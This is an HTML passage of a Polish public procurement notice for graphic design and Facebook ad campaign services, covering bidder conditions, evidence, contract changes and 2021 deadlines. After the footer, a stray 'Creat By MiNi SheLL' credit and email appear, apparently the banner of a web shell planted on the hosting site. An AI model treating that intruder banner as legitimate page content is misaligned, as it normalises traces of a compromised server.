9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający stawia warunki udziału dot. zdolności technicznej lub<br/>zawodowej.Zamawiającyuzna spełnienie w/w warunku, jeżeli Wykonawca:1. Wykonawca<br/>wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonał należycie, a w przypadku<br/>świadczeń okresowych lub ciągłych wykonuje należycie: - co najmniej 1 usługę polegającą na<br/>realizacji usług projektowania graficznego na potrzeby działań reklamowych/promocyjnych w<br/>Internecie Opis sposobu dokonywania oceny spełnienia tego warunku:Zamawiający dokona<br/>oceny spełnienia w/w warunku według formuły „spełnia/nie spełnia” na podstawie wykazu<br/>zawierającego usługę wykonaną w okresie ostatnich trzech lat przed upływem terminu składania<br/>ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, odpowiadającą w/w przedmiotowi zamówienia, z podaniem:- nazwy jednostki, dla której<br/>była lub jest świadczona usługa,- przedmiotu i zakresu realizacji usługi,- daty realizacji usługi,<br/>oraz załączeniem dokumentu lub dokumentów potwierdzających, że usługa wymieniona w<br/>wykazie została wykonana lub jest wykonywana należycie (np. referencje). W przypadku<br/>świadczenia okresowego lub ciągłego nadal wykonywanego referencje bądź inne dokumenty<br/>potwierdzające jego należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące<br/>przed upływem terminu składania ofert.Faktura VAT (jako dokument potwierdzający należyte<br/>wykonanie usługi) wystawiona przez Wykonawcę w ramach danej usługi wskazanej w wykazie<br/>usług zrealizowanych, nie będzie brana pod uwagę przez Zamawiającego. Sam dokument<br/>faktury, bez żadnych dodatkowych informacji na temat należytego wykonania, nie może ze swej<br/>istoty tego faktu potwierdzać. Z tego dokumentu nie wynika chociażby, że zamówienie zostało<br/>wykonane w terminie, a na Wykonawcę nie nałożono kar umownych czy potrąceń.Dokumenty<br/>potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub<br/>czytelnej kserokopii poświadczonej „za zgodność z oryginałem” przez Wykonawcę lub osobę<br/>upoważnioną do występowania w imieniu Wykonawcy.2Wykonawca wykaże, iż dysponuje<br/>osobami zdolnymi do wykonania zamówienia. Zamawiający uzna spełnienie ww. warunku, jeżeli<br/>Wykonawca wykaże, że w wykonywaniu przedmiotu zamówienia uczestniczyć będą<br/>przynajmniej:a. grafik - co najmniej 1 osoba, która powinna posiadać doświadczenie, w okresie<br/>ostatnich trzech lat przed upływem terminu składania ofert, w realizacji przynajmniej 3 usług<br/>polegających na projektowaniu grafiki w postaci reklam/postów na potrzeby kampanii<br/>Internetowej;b. specjalista ds. kampanii reklamowych w mediach społecznościowych - co<br/>najmniej 1 osoba, która powinna posiadać doświadczenie, w okresie ostatnich trzech lat przed<br/>upływem terminu składania ofert, w realizacji kampanii reklamowych na Facebook’u w ramach<br/>co najmniej 3 usług o charakterze reklamowym/promocyjnym, przeprowadzonych w<br/>Internecie;Opis sposobu dokonywania oceny spełnienia tego warunku:Zamawiający dokona<br/>oceny spełnienia w/w warunku według formuły „spełnia/nie spełnia” na podstawie wykazu<br/>zawierającego imię i nazwisko osób, które będą uczestniczyć w realizacji zamówienia jako: -<br/>grafik wraz z podaniem daty realizacji usługi, przedmiotu usługi, nazwy zleceniodawcy, na<br/>rzecz którego była wykonana, podstawy dysponowania osobą w ramach realizacji<br/>zamówienia specjalistyds. kampanii internetowych wraz z podaniem daty realizacji usługi, przedmiotu usługi,<br/>nazwy zleceniodawcy, na rzecz którego była wykonana, podstawy dysponowania osobą w<br/>ramach realizacji zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykazu usługi wykonanej, a w przypadku świadczenia powtarzającego<br/>się lub ciągłego również wykonywanej, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem jej przedmiotu i zakresu, daty wykonania i<br/>podmiotów, na rzecz których usługa została wykonana lub jest wykonywana, oraz załączeniem<br/>dowodów określających, czy ta usługa została wykonana lub jest wykonywana należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego usługa została wykonana, a w przypadku świadczenia powtarzającego się lub ciągłego jest<br/>wykonywana, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy; w przypadku świadczenia powtarzającego się lub ciągłego<br/>nadal wykonywanego referencje bądź inne dokumenty potwierdzające jej należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy – wg Załącznika Nr 5 do SWZ;2) wykazu osób,<br/>skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami – wg Załącznika Nr 6 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.2.W przypadku, o którym<br/>mowa w pkt. 1 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. 3. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 455 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość wprowadzenia zmiany<br/>do niniejszej umowy w zakresie: Grafika i Specjalisty ds. kampanii internetowychWarunki<br/>zmiany: zmianę taką dopuszcza się w sytuacji, gdy okaże się ona konieczna ze względu na<br/>śmierć lub chorobę bądź inną okoliczność dot. w/w personelu (uzasadnione przez Wykonawcę)<br/>wskazanego w ofercie. Warunkiem dokonania takiej zmiany jest poinformowanie Zamawiającego<br/>przez Wykonawcę o konieczności zmiany wraz z podaniem przyczyn oraz przekazanie<br/>Zamawiającemu do jego akceptacji danych osobowych wraz z dokumentami potwierdzającymi<br/>kwalifikacje i doświadczenie zawodowe osoby proponowanej w zastępstwie. Kwalifikacje i<br/>doświadczenie zawodowe grafika i specjalisty ds. kampanii internetowych zostały określone w<br/>SWZ w pkt. 14.2. ust 4 ppkt 2. Proponowani do zmiany grafika i specjalisty ds. kampanii<br/>internetowych muszą wykazać się kwalifikacjami i doświadczeniem zawodowym równym bądź<br/>wyższym w stosunku do wskazanego przez Wykonawcę w załączniku do oferty. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">11.1.	Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem platformy: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/transakcja/470092</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-23 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> wyjaśnienie do pkt 4.2.10.): Zamówienie należy zrealizować w terminie do 5 miesięcy od dnia podpisania umowy, jednak nie później niż do 15 grudnia 2021 r.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com